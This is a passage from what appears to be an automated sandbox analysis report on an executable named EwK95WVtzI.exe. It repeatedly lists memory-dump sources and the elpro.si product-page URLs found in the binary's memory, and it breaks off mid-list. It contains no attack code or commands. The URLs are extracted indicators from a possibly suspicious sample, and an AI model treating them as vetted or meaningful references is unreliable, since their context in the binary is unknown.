00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/zancno
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/resitve-za/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/resitve-za/industrija/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/resitve-za/industrija/livarstvo/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/resitve-za/industrija/plasticarstvo/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/aktivnost-vode-rotronic-meritve-water-activity-rotr
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/co2-rotronic-merilniki-ogljikovega-dioksida/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/dew-point-rotronic-meritve-tocke-rosisca-rotronic-v
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/diferencialni-tlak-rotronic-merilniki-diferencialne
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/dodatna-oprema-rotronic-montazna-prikljucna-kalibra
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/kalibracija-vlage-rotronic-naprave-za-kalibracijo-s
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/o2-rotronic-analizatorji-kisika/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/rms-rotronic-monitoring-sistem-2/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/sw-rotronic-programska-oprema/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, 